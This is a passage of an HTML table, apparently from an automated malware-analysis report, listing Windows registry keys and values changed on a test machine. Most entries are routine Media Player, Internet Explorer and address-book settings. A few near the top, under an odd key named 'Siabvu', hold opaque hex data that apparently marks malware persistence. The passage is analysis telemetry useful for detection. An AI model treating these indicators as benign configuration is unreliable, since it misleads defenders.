<td><span style="color: black; font-size: xx-small;">hex:ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,da,81,20,17,73,ab,ee,51,52,94,51,12,67,6e,e8,7a,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,8a,c7,26,4a,74,cb,75,91,2d,a4,34,86,54,16,8b,30,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Siabvu</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Siabvu</span></td>
<td><span style="color: black; font-size: xx-small;">Vumyyfdol</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,75,13,7f,ce,dc,8a,b9,4f,2f,3e,98,05,e5,54,e7,1e,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4</span></td>
<td><span style="color: black; font-size: xx-small;">OlkContactRefresh</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4</span></td>
<td><span style="color: black; font-size: xx-small;">OlkFolderRefresh</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4</span></td>
<td><span style="color: black; font-size: xx-small;">FirstRun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4\Wab File Name</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4\Wab File Name</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td><span style="color: black; font-size: xx-small;">FriendlyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Default MidiOut Device"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td><span style="color: black; font-size: xx-small;">CLSID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{07B65360-C445-11CE-AFDE-00AA006C14F4}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td><span style="color: black; font-size: xx-small;">FilterData</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,38,00,00,00,48,00,00,00,6d,69,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device</span></td>
<td><span style="color: black; font-size: xx-small;">MidiOutId</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:ffffffff</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td><span style="color: black; font-size: xx-small;">FriendlyName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Default DirectSound Device"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td><span style="color: black; font-size: xx-small;">CLSID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{79376820-07D0-11CF-A24D-0020AFD79767}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td><span style="color: black; font-size: xx-small;">FilterData</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,08,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,a8,00,00,00,b8,00,00,00,31,74,79,33,00,00,00,00,a8,00,00,00,c8,00,00,00,32,74,79,33,00,00,00,00,a8,00,00,00,d8,00,00,00,33,74,79,33,00,00,00,00,a8,00,00,00,e8,00,00,00,34,74,79,33,00,00,00,00,a8,00,00,00,f8,00,00,00,35,74,79,33,00,00,00,00,a8,00,00,00,08,01,00,00,36,74,79,33,00,00,00,00,a8,00,00,00,18,01,00,00,37,74,79,33,00,00,00,00,a8,00,00,00,28,01,00,00,61,75,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,01,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,09,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,03,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,92,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,40,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,41,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,64,01,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,49,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td><span style="color: black; font-size: xx-small;">DSGuid</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{00000000-0000-0000-0000-000000000000}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Privacy</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Privacy</span></td>
<td><span style="color: black; font-size: xx-small;">CleanCookies</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TabbedBrowsing</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TabbedBrowsing</span></td>
<td><span style="color: black; font-size: xx-small;">NewTabPageShowClosedTabs</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TabbedBrowsing</span></td>
<td><span style="color: black; font-size: xx-small;">NewTabPageShowActivities</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\CommandBar</span></td>
<td><span style="color: black; font-size: xx-small;">CompatibilityViewButtonBalloonCount</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Recovery\Active</span></td>
<td><span style="color: black; font-size: xx-small;">{8CFA7582-04D2-11E2-A16C-08002765500A}</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Recovery\Active</span></td>
<td><span style="color: black; font-size: xx-small;">{E4F1361D-04D0-11E2-A16B-08002765500A}</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4}</span></td>
<td><span style="color: black; font-size: xx-small;">AttemptedAutoRun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{976ABECA-93F7-4d81-9187-2A6137829675}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{99DB05E3-F81E-4C8A-A252-F396306AB6FE}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9F9562EB-15B6-46C6-A7CB-0A66FC65130E}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9FA014E3-076F-4865-A73C-117131B8E292}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{D5E49195-ED19-40fb-9EE0-E6625A808B77}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{E641D09E-E500-4c09-8260-F1CD7B902E9C}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{F24A1BC2-2331-4B91-8A13-5A549DA56E9D}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{FD981763-B6BB-4d51-9143-6D372A0ED56F}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\MediaLibrarySettings</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Skins</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz</span></td>
<td><span style="color: black; font-size: xx-small;">Prefs</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"mute;False"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">InitFlags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">ShowHorizontalSeparator</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">ShowVerticalSeparator</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">PlaylistWidth</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:000000ba</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">PlaylistHeight</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">SettingsWidth</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">SettingsHeight</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000087</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">MetadataWidth</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:000000ba</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">MetadataHeight</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:000000a0</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">CaptionsHeight</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Settings</span></td>
<td><span style="color: black; font-size: xx-small;">Client ID</span></td>
<td><span style="color: black; font-size: xx-small;">"{43209BE6-BD53-40A7-9DD3-50364635A3E4}"</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">AcceptedPrivacyStatement</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">MetadataRetrieval</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">SendUserGUID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">SilentAcquisition</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UsageTracking</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">DisableMRU</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">LaunchIndex</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">AppColorLimited</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">FirstRun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">X</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"10"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Y</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"10"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Width</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"686"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Height</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"536"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Maximized</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"0"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Volume</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000032</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ModeShuffle</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ModeLoop</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Mute</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Balance</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentEffectType</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Battery"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentEffectPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">VideoZoom</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences</span></td>
